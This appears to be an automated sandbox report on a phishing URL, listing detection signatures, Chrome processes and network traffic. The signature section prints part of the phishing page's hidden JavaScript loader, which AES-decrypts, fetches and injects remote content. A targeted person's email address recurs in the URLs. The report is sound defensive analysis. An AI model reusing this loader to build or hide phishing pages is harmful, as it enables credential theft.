Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
https://fcs-aero.com/ilsmart/marketplace/inventory/#ksunya.chan@yogiproducts.com

Overview

General Information

Sample URL:https://fcs-aero.com/ilsmart/marketplace/inventory/#ksunya.chan@yogiproducts.com
Analysis ID:1546308

Detection

HTMLPhisher
Score:48
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Yara detected HtmlPhish70
HTML page contains hidden javascript code
Stores files to the Windows start menu directory
URL contains potential PII (phishing indication)
Uses Javascript AES encryption / decryption (likely to hide suspicious Javascript code)

Classification

  • System is w10x64_ra
  • chrome.exe (PID: 2784 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank" MD5: 83395EAB5B03DEA9720F8D7AC0D15CAA)
    • chrome.exe (PID: 5672 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2092 --field-trial-handle=1928,i,14128857340577309046,9957980302040716392,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 83395EAB5B03DEA9720F8D7AC0D15CAA)
  • chrome.exe (PID: 2816 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://fcs-aero.com/ilsmart/marketplace/inventory/#ksunya.chan@yogiproducts.com" MD5: 83395EAB5B03DEA9720F8D7AC0D15CAA)
  • chrome.exe (PID: 5432 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" MD5: 83395EAB5B03DEA9720F8D7AC0D15CAA)
    • chrome.exe (PID: 4404 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2224 --field-trial-handle=1976,i,16931578172038892792,8681345284959200474,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 83395EAB5B03DEA9720F8D7AC0D15CAA)
  • cleanup
SourceRuleDescriptionAuthorStrings
2.1.pages.csvJoeSecurity_HtmlPhish_70Yara detected HtmlPhish_70Joe Security
    No Sigma rule has matched
    No Suricata rule has matched

    Click to jump to signature section

    Show All Signature Results

    Phishing

    barindex
    Source: Yara matchFile source: 2.1.pages.csv, type: HTML
    Source: https://vtirds.com/1snyprl1jkeknjkxdm-x6amst48yp-cn11nl9oskvc7y/#xksunya.chan@yogiproducts.comHTTP Parser: Base64 decoded: {"a":"8I4isyD\/WLyNCJTxCL1BtbhXEPGKC0J1WQpTiVqNiR0=","c":"8d6da43e73f0e861bc94e7c4f5343362","b":"98eaebb70f71b430f9da2c2ef43dacb17400845ed84b7044a8919896923d9e98db3a3ba7b3d8cf0bef270e95651aa803894bdfb128cbc4c1a3438b03c7f97eb9f39303e3685b9a834c18eb438306af...
    Source: https://fcs-aero.com/ilsmart/marketplace/inventory/#ksunya.chan@yogiproducts.comSample URL: PII: ksunya.chan@yogiproducts.com
    Source: https://fcs-aero.com/ilsmart/marketplace/inventory/#ksunya.chan@yogiproducts.comSample URL: PII: ksunya.chan@yogiproducts.com
    Source: https://fcs-aero.com/ilsmart/marketplace/inventory/#ksunya.chan@yogiproducts.comSample URL: PII: ksunya.chan@yogiproducts.com
    Source: https://fcs-aero.com/ilsmart/marketplace/inventory/#ksunya.chan@yogiproducts.comSample URL: PII: ksunya.chan@yogiproducts.com
    Source: https://fcs-aero.com/ilsmart/marketplace/inventory/#ksunya.chan@yogiproducts.comSample URL: PII: ksunya.chan@yogiproducts.com
    Source: https://fcs-aero.com/ilsmart/marketplace/inventory/#ksunya.chan@yogiproducts.comSample URL: PII: ksunya.chan@yogiproducts.com
    Source: https://fcs-aero.com/ilsmart/marketplace/inventory/#ksunya.chan@yogiproducts.comSample URL: PII: ksunya.chan@yogiproducts.com
    Source: https://fcs-aero.com/ilsmart/marketplace/inventory/#ksunya.chan@yogiproducts.comSample URL: PII: ksunya.chan@yogiproducts.com
    Source: https://fcs-aero.com/ilsmart/marketplace/inventory/#ksunya.chan@yogiproducts.comSample URL: PII: ksunya.chan@yogiproducts.com
    Source: https://fcs-aero.com/ilsmart/marketplace/inventory/#ksunya.chan@yogiproducts.comSample URL: PII: ksunya.chan@yogiproducts.com
    Source: https://fcs-aero.com/ilsmart/marketplace/inventory/#ksunya.chan@yogiproducts.comSample URL: PII: ksunya.chan@yogiproducts.com
    Source: https://fcs-aero.com/ilsmart/marketplace/inventory/#ksunya.chan@yogiproducts.comSample URL: PII: ksunya.chan@yogiproducts.com
    Source: https://fcs-aero.com/ilsmart/marketplace/inventory/#ksunya.chan@yogiproducts.comSample URL: PII: ksunya.chan@yogiproducts.com
    Source: https://fcs-aero.com/ilsmart/marketplace/inventory/#ksunya.chan@yogiproducts.comSample URL: PII: ksunya.chan@yogiproducts.com
    Source: https://vtirds.com/1snyprl1jkeknjkxdm-x6amst48yp-cn11nl9oskvc7y/#xksunya.chan@yogiproducts.comHTTP Parser: async function gainful(labored) { var{a,b,c,d}=json.parse(labored); return cryptojs.aes.decrypt(a,cryptojs.pbkdf2(cryptojs.enc.hex.parse(d), cryptojs.enc.hex.parse(b), {hasher:cryptojs.algo.sha512,keysize: 64/8, iterations: 999}), {iv:cryptojs.enc.hex.parse(c)}).tostring(cryptojs.enc.utf8); }async function hackle(){ document.write(await gainful(await(await fetch(awaitgainful(atob(`eyjhijoioek0axn5rfwvv0x5tknkvhhdtdfcdgjowevqr0tdmeoxv1fwvglwcu5puja9iiwiyyi6ijhknmrhndnlnznmmgu4njfiyzk0ztdjngy1mzqzmzyyiiwiyii6ijk4zwflymi3mgy3mwi0mzbmowrhmmmyzwy0m2rhy2ixnzqwmdg0nwvkodrinza0nge4ote5odk2otizzdllothkyjnhm2jhn2izzdhjzjbizwyynzblotu2ntfhytgwmzg5ngjkzmixmjhjymm0yzfhmzqzogiwm2m3zjk3zwi5zjm5mzazztm2odviowe4mzrjmthlyjqzodmwnmfmnjk2nmzlytjjyty5mty2ymqzmta3nje5ndk2yje3zdewogvmytc5m2i3ownjmtdjmtlknwi0mjzmm2vimzk0yzdiyjrmzwi4ywvlytmxmdvmzgy5ndm3ndjkogewyzg5odlmowqymmu5mda5ymmzzdljmjy5otlinza0nde3ngzmmda3nznkndljmdy5nja3ndljodkxm2nlodzmodbkndnindbkzmq3otk4nwmwnwqxzme5mzcxztjhowqz...
    Source: https://vtirds.com/1snyprl1jkeknjkxdm-x6amst48yp-cn11nl9oskvc7y/#xkbillgHTTP Parser: async function gainful(labored) { var{a,b,c,d}=json.parse(labored); return cryptojs.aes.decrypt(a,cryptojs.pbkdf2(cryptojs.enc.hex.parse(d), cryptojs.enc.hex.parse(b), {hasher:cryptojs.algo.sha512,keysize: 64/8, iterations: 999}), {iv:cryptojs.enc.hex.parse(c)}).tostring(cryptojs.enc.utf8); }async function hackle(){ document.write(await gainful(await(await fetch(awaitgainful(atob(`eyjhijoioek0axn5rfwvv0x5tknkvhhdtdfcdgjowevqr0tdmeoxv1fwvglwcu5puja9iiwiyyi6ijhknmrhndnlnznmmgu4njfiyzk0ztdjngy1mzqzmzyyiiwiyii6ijk4zwflymi3mgy3mwi0mzbmowrhmmmyzwy0m2rhy2ixnzqwmdg0nwvkodrinza0nge4ote5odk2otizzdllothkyjnhm2jhn2izzdhjzjbizwyynzblotu2ntfhytgwmzg5ngjkzmixmjhjymm0yzfhmzqzogiwm2m3zjk3zwi5zjm5mzazztm2odviowe4mzrjmthlyjqzodmwnmfmnjk2nmzlytjjyty5mty2ymqzmta3nje5ndk2yje3zdewogvmytc5m2i3ownjmtdjmtlknwi0mjzmm2vimzk0yzdiyjrmzwi4ywvlytmxmdvmzgy5ndm3ndjkogewyzg5odlmowqymmu5mda5ymmzzdljmjy5otlinza0nde3ngzmmda3nznkndljmdy5nja3ndljodkxm2nlodzmodbkndnindbkzmq3otk4nwmwnwqxzme5mzcxztjhowqz...
    Source: https://vtirds.com/1snyprl1jkeknjkxdm-x6amst48yp-cn11nl9oskvc7y/#xbillg@microsoft.comHTTP Parser: async function gainful(labored) { var{a,b,c,d}=json.parse(labored); return cryptojs.aes.decrypt(a,cryptojs.pbkdf2(cryptojs.enc.hex.parse(d), cryptojs.enc.hex.parse(b), {hasher:cryptojs.algo.sha512,keysize: 64/8, iterations: 999}), {iv:cryptojs.enc.hex.parse(c)}).tostring(cryptojs.enc.utf8); }async function hackle(){ document.write(await gainful(await(await fetch(awaitgainful(atob(`eyjhijoioek0axn5rfwvv0x5tknkvhhdtdfcdgjowevqr0tdmeoxv1fwvglwcu5puja9iiwiyyi6ijhknmrhndnlnznmmgu4njfiyzk0ztdjngy1mzqzmzyyiiwiyii6ijk4zwflymi3mgy3mwi0mzbmowrhmmmyzwy0m2rhy2ixnzqwmdg0nwvkodrinza0nge4ote5odk2otizzdllothkyjnhm2jhn2izzdhjzjbizwyynzblotu2ntfhytgwmzg5ngjkzmixmjhjymm0yzfhmzqzogiwm2m3zjk3zwi5zjm5mzazztm2odviowe4mzrjmthlyjqzodmwnmfmnjk2nmzlytjjyty5mty2ymqzmta3nje5ndk2yje3zdewogvmytc5m2i3ownjmtdjmtlknwi0mjzmm2vimzk0yzdiyjrmzwi4ywvlytmxmdvmzgy5ndm3ndjkogewyzg5odlmowqymmu5mda5ymmzzdljmjy5otlinza0nde3ngzmmda3nznkndljmdy5nja3ndljodkxm2nlodzmodbkndnindbkzmq3otk4nwmwnwqxzme5mzcxztjhowqz...
    Source: https://fcs-aero.com/ilsmart/marketplace/inventory/#ksunya.chan@yogiproducts.comHTTP Parser: No favicon
    Source: https://vtirds.com/1snyprl1jkeknjkxdm-x6amst48yp-cn11nl9oskvc7y/#xksunya.chan@yogiproducts.comHTTP Parser: No favicon
    Source: https://vtirds.com/1snyprl1jkeknjkxdm-x6amst48yp-cn11nl9oskvc7y/#xksunya.chan@yogiproducts.comHTTP Parser: No favicon
    Source: chrome://newtab/HTTP Parser: No favicon
    Source: chrome://newtab/HTTP Parser: No favicon
    Source: https://vtirds.com/1snyprl1jkeknjkxdm-x6amst48yp-cn11nl9oskvc7y/#xksunya.chan@yogiproducts.comHTTP Parser: No favicon
    Source: chrome://newtab/HTTP Parser: No favicon
    Source: https://vtirds.com/1snyprl1jkeknjkxdm-x6amst48yp-cn11nl9oskvc7y/#xkbillgHTTP Parser: No favicon
    Source: https://vtirds.com/1snyprl1jkeknjkxdm-x6amst48yp-cn11nl9oskvc7y/#xbillg@microsoft.comHTTP Parser: No favicon
    Source: unknownHTTPS traffic detected: 52.149.20.212:443 -> 192.168.2.18:49706 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 52.149.20.212:443 -> 192.168.2.18:49755 version: TLS 1.2
    Source: chrome.exeMemory has grown: Private usage: 22MB later: 32MB
    Source: unknownTCP traffic detected without corresponding DNS query: 52.149.20.212
    Source: unknownTCP traffic detected without corresponding DNS query: 52.149.20.212
    Source: unknownTCP traffic detected without corresponding DNS query: 52.149.20.212
    Source: unknownTCP traffic detected without corresponding DNS query: 52.149.20.212
    Source: unknownTCP traffic detected without corresponding DNS query: 52.149.20.212
    Source: unknownTCP traffic detected without corresponding DNS query: 52.149.20.212
    Source: unknownTCP traffic detected without corresponding DNS query: 52.149.20.212
    Source: unknownTCP traffic detected without corresponding DNS query: 52.149.20.212
    Source: unknownTCP traffic detected without corresponding DNS query: 52.149.20.212
    Source: unknownTCP traffic detected without corresponding DNS query: 52.182.141.63
    Source: unknownTCP traffic detected without corresponding DNS query: 52.149.20.212
    Source: unknownTCP traffic detected without corresponding DNS query: 52.149.20.212
    Source: unknownTCP traffic detected without corresponding DNS query: 52.182.141.63
    Source: unknownTCP traffic detected without corresponding DNS query: 52.182.141.63
    Source: unknownTCP traffic detected without corresponding DNS query: 52.182.141.63
    Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
    Source: unknownTCP traffic detected without corresponding DNS query: 52.182.141.63
    Source: unknownTCP traffic detected without corresponding DNS query: 52.182.141.63
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
    Source: unknownTCP traffic detected without corresponding DNS query: 52.182.141.63
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownTCP traffic detected without corresponding DNS query: 40.126.32.74
    Source: unknownTCP traffic detected without corresponding DNS query: 40.126.32.74
    Source: unknownTCP traffic detected without corresponding DNS query: 40.126.32.74
    Source: unknownTCP traffic detected without corresponding DNS query: 40.126.32.74
    Source: global trafficDNS traffic detected: DNS query: fcs-aero.com
    Source: global trafficDNS traffic detected: DNS query: i.gifer.com
    Source: global trafficDNS traffic detected: DNS query: www.google.com
    Source: global trafficDNS traffic detected: DNS query: vtirds.com
    Source: global trafficDNS traffic detected: DNS query: cdnjs.cloudflare.com
    Source: global trafficDNS traffic detected: DNS query: challenges.cloudflare.com
    Source: global trafficDNS traffic detected: DNS query: bravotechet.ru
    Source: global trafficDNS traffic detected: DNS query: cdn.jsdelivr.net
    Source: global trafficDNS traffic detected: DNS query: apis.google.com
    Source: global trafficDNS traffic detected: DNS query: play.google.com
    Source: global trafficDNS traffic detected: DNS query: ogs.google.com
    Source: unknownNetwork traffic detected: HTTP traffic on port 49708 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49817 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49741
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49740
    Source: unknownNetwork traffic detected: HTTP traffic on port 49800 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49720 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49795 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49739
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49738
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49737
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49736
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49735
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49734
    Source: unknownNetwork traffic detected: HTTP traffic on port 49772 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49733
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49732
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49731
    Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
    Source: unknownNetwork traffic detected: HTTP traffic on port 49812 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49806 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49823 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49729
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49728
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49727
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49726
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49725
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49724
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49723
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49722
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49721
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49720
    Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49697 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49834 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49760 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49828 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49805 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49719
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49718
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49717
    Source: unknownNetwork traffic detected: HTTP traffic on port 49715 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49716
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49715
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49836
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49835
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49713
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49834
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49712
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49833
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49711
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49832
    Source: unknownNetwork traffic detected: HTTP traffic on port 49709 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49831
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49830
    Source: unknownNetwork traffic detected: HTTP traffic on port 49822 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49726 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49796 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49709
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49708
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49829
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49707
    Source: unknownNetwork traffic detected: HTTP traffic on port 49811 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49828
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49706
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49827
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49826
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49825
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49824
    Source: unknownNetwork traffic detected: HTTP traffic on port 49737 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49702
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49823
    Source: unknownNetwork traffic detected: HTTP traffic on port 49771 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49822
    Source: unknownNetwork traffic detected: HTTP traffic on port 49699 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49813 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49836 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49807 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49713 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49736 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49759 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49753 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49775
    Source: unknownNetwork traffic detected: HTTP traffic on port 49707 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49774
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49773
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49772
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49771
    Source: unknownNetwork traffic detected: HTTP traffic on port 49724 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49802 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49830 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49769
    Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49768
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49762
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49761
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49760
    Source: unknownNetwork traffic detected: HTTP traffic on port 49702 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49725 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49741 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49719 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49797 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49801 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49824 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49759
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49755
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49753
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49752
    Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49818 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49835 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49747 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49829 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49775 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49747
    Source: unknownNetwork traffic detected: HTTP traffic on port 49792 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49746
    Source: unknownNetwork traffic detected: HTTP traffic on port 49746 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49769 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49803 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49826 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49717 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49699
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49697
    Source: unknownNetwork traffic detected: HTTP traffic on port 49820 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49711 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49691
    Source: unknownNetwork traffic detected: HTTP traffic on port 49728 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49752 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49798 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49735 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49706 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49712 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49819 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49729 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49793 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49831 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49774 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49799
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49798
    Source: unknownNetwork traffic detected: HTTP traffic on port 49734 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49797
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49796
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49795
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49794
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49793
    Source: unknownNetwork traffic detected: HTTP traffic on port 49814 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49792
    Source: unknownNetwork traffic detected: HTTP traffic on port 49740 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49768 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49723 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49825 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49808 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49820
    Source: unknownNetwork traffic detected: HTTP traffic on port 49727 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49691 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49762 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49833 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49819
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49818
    Source: unknownNetwork traffic detected: HTTP traffic on port 49799 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49810 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49817
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49816
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49815
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49814
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49813
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49812
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49811
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49810
    Source: unknownNetwork traffic detected: HTTP traffic on port 49816 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49679 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49721 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49794 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49827 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49809
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49808
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49807
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49806
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49805
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49804
    Source: unknownNetwork traffic detected: HTTP traffic on port 49773 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49803
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49802
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49801
    Source: unknownNetwork traffic detected: HTTP traffic on port 49739 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49800
    Source: unknownNetwork traffic detected: HTTP traffic on port 49815 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49722 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49809 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49738 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49755 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49673 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49761 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49804 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49832 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49716 -> 443
    Source: unknownHTTPS traffic detected: 52.149.20.212:443 -> 192.168.2.18:49706 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 52.149.20.212:443 -> 192.168.2.18:49755 version: TLS 1.2
    Source: classification engineClassification label: mal48.phis.win@41/0@48/291
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps
    Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
